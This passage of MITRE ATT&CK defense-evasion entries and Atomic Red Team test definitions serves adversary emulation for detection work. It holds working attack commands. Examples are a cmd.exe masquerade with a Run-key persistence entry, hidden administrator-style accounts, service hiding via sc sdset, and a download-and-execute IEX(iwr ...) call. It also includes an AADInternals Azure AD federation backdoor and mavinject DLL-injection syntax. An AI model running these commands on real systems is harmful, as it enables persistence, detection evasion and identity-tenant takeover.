x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
x_mitre_version: '1.2'
atomic_tests: []
T1218.013:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9
created: '2021-09-22T17:45:10.241Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218/013
external_id: T1218.013
- source_name: ATT Lazarus TTP Evolution
description: Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and
evolution. Retrieved September 22, 2021.
url: https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution
- source_name: LOLBAS Mavinject
description: LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.
url: https://lolbas-project.github.io/lolbas/Binaries/Mavinject/
- source_name: Mavinject Functionality Deconstructed
description: Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed.
Retrieved September 22, 2021.
url: https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e
- source_name: Reaqta Mavinject
description: 'Reaqta. (2017, December 16). From False Positive to True Positive:
the story of Mavinject.exe, the Microsoft Injector. Retrieved September
22, 2021.'
url: https://reaqta.com/2017/12/mavinject-microsoft-injector/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:28.606Z'
name: Mavinject
description: "Adversaries may abuse mavinject.exe to proxy execution of malicious
code. Mavinject.exe is the Microsoft Application Virtualization Injector,
a Windows utility that can inject code into external processes as part of
Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries
may abuse mavinject.exe to inject malicious DLLs into running processes (i.e.
[Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)),
allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe
PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation:
Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft,
proxying execution via this method may evade detection by security products
because the execution is masked under a legitimate process. \n\nIn addition
to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001),
Mavinject.exe can also be abused to perform import descriptor injection via
its /HMODULE command-line parameter (ex. mavinject.exe
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.0'
atomic_tests: []
T1036.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2
created: '2020-02-10T20:43:10.239Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1036/005
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
Retrieved September 12, 2024.
url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
- source_name: Aquasec Kubernetes Backdoor 2023
description: Michael Katchinskiy and Assaf Morag. (2023, April 21). First-Ever
Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved March
24, 2025.
url: https://www.aquasec.com/blog/leveraging-kubernetes-rbac-to-backdoor-clusters/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:28.950Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: "Adversaries may match or approximate the name or location of legitimate
files, Registry keys, or other resources when naming/placing them. This is
done for the sake of evading defenses and observation. \n\nThis may be done
by placing an executable in a commonly trusted directory (ex: under System32)
or giving it the name of a legitimate, trusted program (ex: `svchost.exe`).
Alternatively, a Windows Registry key may be given a close approximation to
a key used by a legitimate program. In containerized environments, a threat
actor may create a resource in a trusted namespace or one that matches the
naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes
Backdoor 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Yossi Weizman, Azure Defender Research Team
- Vishwas Manral, McAfee
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
- ESXi
- Linux
- macOS
- Windows
x_mitre_version: '2.0'
identifier: T1036.005
atomic_tests:
- name: Execute a process from a directory masquerading as the current parent
directory
auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
description: 'Create and execute a process from a directory masquerading as
the current parent directory (`...` instead of normal `..`)
'
supported_platforms:
- macos
- linux
input_arguments:
test_message:
description: Test message to echo out to the screen
type: string
default: Hello from the Atomic Red Team test T1036.005#1
executor:
name: sh
elevation_required: false
command: |
mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"
cleanup_command: |
rm -f $HOME/.../sh
rmdir $HOME/.../
- name: Masquerade as a built-in system executable
auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
description: 'Launch an executable that attempts to masquerade as a legitimate
executable.
'
supported_platforms:
- windows
input_arguments:
executable_filepath:
description: File path where the generated executable will be dropped and
executed from. The filename should be the name of a built-in system utility.
type: string
default: "$Env:windir\\Temp\\svchost.exe"
executor:
command: |
Add-Type -TypeDefinition @'
public class Test {
public static void Main(string[] args) {
System.Console.WriteLine("tweet, tweet");
}
}
'@ -OutputAssembly "#{executable_filepath}"
Start-Process -FilePath "#{executable_filepath}"
cleanup_command: 'Remove-Item -Path "#{executable_filepath}" -ErrorAction
Ignore
'
name: powershell
- name: Masquerading cmd.exe as VEDetector.exe
auto_generated_guid: 03ae82a6-9fa0-465b-91df-124d8ca5c4e8
description: |
This test simulates an adversary renaming cmd.exe to VEDetector.exe to masquerade as a legitimate application.
The test copies cmd.exe, renames it to VEDetector.exe, adds a registry run key for persistence, and executes the renamed binary.
This technique may be used to evade detection by mimicking legitimate software names or locations.
**Expected Output:**
- A new process named VEDetector.exe appears in the process list, but its behavior matches cmd.exe.
- SIEM/EDR systems may detect this as suspicious process activity (e.g., Sysmon Event ID 1 for process creation, or Event ID 13 for registry modifications).
- Registry modification in HKLM:\Software\Microsoft\Windows\CurrentVersion\Run may trigger persistence alerts in XDR platforms.
**References:**
- [MITRE ATT&CK T1036.005](https://attack.mitre.org/techniques/T1036/005/)
- [Sysmon Process Creation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)
supported_platforms:
- windows
input_arguments:
ved_path:
description: Directory path where VEDetector.exe will be created
type: Path
default: "$env:TEMP"
source_file:
description: Path to the source cmd.exe file
type: Path
default: "$env:SystemRoot\\System32\\cmd.exe"
dependency_executor_name: powershell
dependencies:
- description: 'The source cmd.exe file must exist on the system.
'
prereq_command: 'if (Test-Path "#{source_file}") { exit 0 } else { exit 1
}
'
get_prereq_command: |
Write-Host "[-] Source file not found: #{source_file}. Ensure cmd.exe exists in the specified path."
exit 1
executor:
name: powershell
elevation_required: true
command: |
# Copy and rename cmd.exe to VEDetector.exe
Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force
# Create registry run key for persistence
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force
# Start the renamed process
Start-Process -FilePath "#{ved_path}\VEDetector.exe"
Start-Sleep -Seconds 5
cleanup_command: |
# Remove registry key
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -ErrorAction SilentlyContinue
# Stop the process
Stop-Process -Name "VEDetector" -Force -ErrorAction SilentlyContinue
# Remove the file
Remove-Item -Path "#{ved_path}\VEDetector.exe" -Force -ErrorAction SilentlyContinue
Write-Host "[+] Cleaned up VEDetector artifacts"
T1600:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8
created: '2020-10-19T18:47:08.759Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1600
external_id: T1600
- source_name: Cisco Synful Knock Evolution
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
- source_name: Cisco Blog Legacy Device Attacks
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:30.124Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.1'
atomic_tests: []
T1036.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471
created: '2023-03-08T22:40:06.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1036/008
external_id: T1036.008
- source_name: polygot_icedID
description: 'Lim, M. (2022, September 27). More Than Meets the Eye: Exposing
a Polyglot File That Delivers IcedID. Retrieved September 29, 2022.'
url: https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-08T17:44:11.183Z'
name: Masquerade File Type
description: "Adversaries may masquerade malicious payloads as legitimate files
through changes to the payload's formatting, including the file’s signature,
extension, icon, and contents. Various file types have a typical standard
format, including how they are encoded and organized. For example, a file’s
signature (also known as header or magic bytes) is the beginning bytes of
a file and is often used to identify the file’s type. For example, the header
of a JPEG file, is 0xFF 0xD8 and the file extension is either
`.JPE`, `.JPEG` or `.JPG`. \n\nAdversaries may edit the header’s hex code
and/or the file extension of a malicious payload in order to bypass file validation
checks and/or input sanitization. This behavior is commonly used when payload
files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105))
and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001))
so that adversaries may move their malware without triggering detections.
\n\nCommon non-executable file types and extensions, such as text files (`.txt`)
and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign.
\ Based on this, adversaries may use a file extension to disguise malware,
such as naming a PHP backdoor code with a file name of test.gif.
A user may not know that a file is malicious due to the benign appearance
and file extension.\n\nPolyglot files, which are files that have multiple
different file types and that function differently based on the application
that will execute them, may also be used to disguise malicious malware and
capabilities.(Citation: polygot_icedID)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
- Ben Smith
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.1'
atomic_tests: []
T1564:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8
created: '2020-02-26T17:41:25.933Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564
external_id: T1564
- source_name: Cybereason OSX Pirrit
description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved
December 10, 2021.
url: https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf
- source_name: MalwareBytes ADS July 2015
description: Arntz, P. (2015, July 22). Introduction to Alternate Data Streams.
Retrieved March 21, 2018.
url: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
- source_name: Sofacy Komplex Trojan
description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- source_name: Sophos Ragnar May 2020
description: SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys
virtual machine to dodge security. Retrieved June 29, 2020.
url: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:31.407Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Office Suite
- Windows
- macOS
- ESXi
x_mitre_version: '1.4'
identifier: T1564
atomic_tests:
- name: Extract binary files via VBA
auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a
description: "This module extracts a binary (calc.exe) from inside of another
binary. \n\nIn the wild maldoc authors will use this technique to hide binaries
inside of files stored \nwithin the office document itself. An example of
this technique can be seen in sample\n\nf986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226\n\nThis
sample contains a document inside of itself. Document 1 is the actual maldoc
itself, document 2\nis the same document without all the malicious code. Document
1 will copy Document 2 to the file system\nand then \"peek\" inside of this
document and pull out the oleObject.bin file. Contained inside of this\noleObject.bin
file is a payload that is parsed out and executed on the file system.\n"
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft Word must be installed
'
prereq_command: |
try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
'
executor:
command: |
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
$macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
'
name: powershell
- name: Create a Hidden User Called "$"
auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
description: Creating a user with a username containing "$"
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: net user $ ATOMIC123! /add /active:yes
cleanup_command: net user $ /DELETE 2>&1
- name: Create an "Administrator " user (with a space on the end)
auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c
description: Creating a user with a username containing with a space on the
end
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: New-LocalUser -Name "Administrator " -NoPassword
cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null
- name: Create and Hide a Service with sc.exe
auto_generated_guid: 333c7de0-6fbe-42aa-ac2b-c7e40b18246a
description: |
The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query.
Upon successful execution, sc.exe creates a new service changes the security descriptor.
https://twitter.com/Alh4zr3d/status/1580925761996828672
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
supported_platforms:
- windows
input_arguments:
service_name:
description: Name of service to create
type: string
default: AtomicService
executable_command:
description: Command to execute as a service
type: string
default: C:\Windows\System32\calc.exe
executor:
command: |
sc.exe create #{service_name} binPath= "#{executable_command}"
sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
cleanup_command: |
sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
sc.exe delete #{service_name}
name: command_prompt
elevation_required: true
- name: Command Execution with NirCmd
auto_generated_guid: 2748ab4a-1e0b-4cf2-a2b0-8ef765bec7be
description: |
NirCmd is used by threat actors to execute commands, which can include recon and privilege escalation via running commands via the SYSTEM account
See https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis
supported_platforms:
- windows
input_arguments:
nircmd_location:
description: Location of nircmd executable
type: Path
default: PathToAtomicsFolder\..\ExternalPayloads\nircmd.exe
command_to_execute:
description: Command for nircmd to execute
type: Path
default: win child class "Shell_TrayWnd" hide class "TrayClockWClass"
cleanup_command_to_execute:
description: Cleanup command to undo the arbitrary command ran by nircmd
type: Path
default: win child class "Shell_TrayWnd" show class "TrayClockWClass"
dependency_executor_name: powershell
dependencies:
- description: 'The Nircmd executable must exist at (#{nircmd_location})
'
prereq_command: 'if (Test-Path "#{nircmd_location}") {exit 0} else {exit 1}
'
get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://www.nirsoft.net/utils/nircmd-x64.zip\"
-outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\nircmd.zip\" \nexpand-archive
-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\nircmd.zip\" -destinationpath
\"PathToAtomicsFolder\\..\\ExternalPayloads\\\"\n"
executor:
command: 'cmd /c "#{nircmd_location}" #{command_to_execute}
'
cleanup_command: 'cmd /c "#{nircmd_location}" #{cleanup_command_to_execute}
-erroraction silentlycontinue | out-null
'
name: powershell
elevation_required: false
T1484.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee
created: '2020-12-28T21:59:02.181Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
- source_name: AWS RE:Inforce Threat Detection 2024
description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
techniques for proactive threat detection. Retrieved September 25, 2024.
url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a
- source_name: AADInternals zure AD Federated Domain
description: Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability
in Azure AD & Office 365 identity federation. Retrieved September 28, 2022.
url: https://o365blog.com/post/federation-vulnerability/
- source_name: Microsoft - Azure AD Federation
description: Microsoft. (2018, November 28). What is federation with Azure
AD?. Retrieved December 30, 2020.
url: https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed
- source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods
description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved
December 30, 2020.
url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml
- source_name: Microsoft - Update or Repair Federated domain
description: Microsoft. (2020, September 14). Update or repair the settings
of a federated domain in Office 365, Azure, or Intune. Retrieved December
30, 2020.
url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365
- source_name: Okta Cross-Tenant Impersonation 2023
description: 'Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant
Impersonation: Prevention and Detection. Retrieved February 15, 2024.'
url: https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved November 17, 2024.
url: https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:32.244Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
between domains and tenants to evade defenses and/or elevate privileges.Trust
details, such as whether or not user identities are federated, allow authentication
and authorization properties to apply between domains or tenants for the purpose
of accessing shared resources.(Citation: Microsoft - Azure AD Federation)
These trust objects may include accounts, credentials, and other authentication
material applied to servers, tokens, and domains.\n\nManipulating these trusts
may allow an adversary to escalate privileges and/or evade defenses by modifying
settings to add objects which they control. For example, in Microsoft Active
Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002)
without the need to compromise the signing certificate to forge new credentials.
Instead, an adversary can manipulate domain trusts to add their own signing
certificate. An adversary may also convert an AD domain to a federated domain
using Active Directory Federation Services (AD FS), which may enable malicious
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
provider to an identity tenant such as Okta or AWS IAM Identity Center, which
may enable the adversary to authenticate as any user of the tenant.(Citation:
Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
gain broad access into a variety of cloud-based services that leverage the
identity tenant. For example, in AWS environments, an adversary that creates
a new identity provider for an AWS Organization will be able to federate into
all of the AWS Organization member accounts without creating identities for
each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Praetorian
- Obsidian Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Identity Provider
- Windows
x_mitre_version: '2.2'
identifier: T1484.002
atomic_tests:
- name: Add Federation to Azure AD
auto_generated_guid: 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7
description: |
Add a new federated domain to Azure AD using PowerShell.
The malicious domain to be federated must be configured beforehand (outside of the scope of this test):
1. Open Azure Portal
2. Add a new "custom domain name"
3. Verify the domain by following instructions (i.e. create the requested DNS record)
supported_platforms:
- azure-ad
input_arguments:
azure_username:
description: Username of a privileged Azure AD account such as External
Identity Provider Administrator or Global Administrator roles
type: string
default: bruce.wayne@contosocloud.com
azure_password:
description: Password of azure_username
type: string
default: iamthebatman
domain_name:
description: Malicious federated domain name
type: string
default: contoso.com
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD and AADInternals Powershell modules must be installed.
'
prereq_command: 'if ((Get-Module -ListAvailable -Name AzureAD) -And (Get-Module
-ListAvailable -Name AADInternals)) {exit 0} else {exit 1}
'
get_prereq_command: |
Install-Module -Name AzureAD -Force
Install-Module -Name AADInternals -Force
executor:
command: |
Import-Module AzureAD
Import-Module AADInternals
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
try {
Connect-AzureAD -Credential $Credential -ErrorAction Stop > $null
}
catch {
Write-Host "Error: AzureAD could not connect"
exit 1
}
try {
$domain = Get-AzureADDomain -Name "#{domain_name}"
}
catch {
Write-Host "Error: domain ""#{domain_name}"" not found"
exit 1
}
if (-Not $domain.IsVerified) {
Write-Host "Error: domain ""#{domain_name}"" not verified"
exit 1
}
if ($domain.AuthenticationType -eq "Federated") {
Write-Host "Error: domain ""#{domain_name}"" already federated. Try with a different domain or re-create it before."
exit 1
}
$at = Get-AADIntAccessTokenForAADGraph -Credentials $Credential
if (-Not $at) {
Write-Host "Error: AADInternals could not connect"
exit 1
}
$new = ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "#{domain_name}"
if ($new) {
Write-Host "Federation successfully added to Azure AD"
Write-Host $new
}
else {
Write-Host "The federation setup failed"
}
Write-Host "End of federation configuration."
cleanup_command: |
try {
Import-Module AzureAD -ErrorAction Ignore
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
Connect-AzureAD -Credential $Credential -ErrorAction Ignore > $null
Remove-AzureADDomain -Name "#{domain_name}" -ErrorAction Ignore
} catch {}
name: powershell
T1562.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--28170e17-8384-415c-8486-2e6b294cb803
created: '2021-06-23T20:00:27.600Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562/009
external_id: T1562.009
- source_name: BleepingComputer REvil 2021
description: Abrams, L. (2021, March 19). REvil ransomware has a new ‘Windows
Safe Mode’ encryption mode. Retrieved June 23, 2021.
url: https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/
- source_name: Cybereason Nocturnus MedusaLocker 2020
description: Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker
Ransomware. Retrieved June 23, 2021.
url: https://www.cybereason.com/blog/medusalocker-ransomware
- source_name: Microsoft Bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
- source_name: Microsoft bcdedit 2021
description: Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021.
url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit
- source_name: Microsoft Safe Mode
description: Microsoft. (n.d.). Start your PC in safe mode in Windows 10.
Retrieved June 23, 2021.
url: https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234
- source_name: CyberArk Labs Safe Mode 2016
description: 'Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode
to Domain Compromise. Retrieved June 23, 2021.'
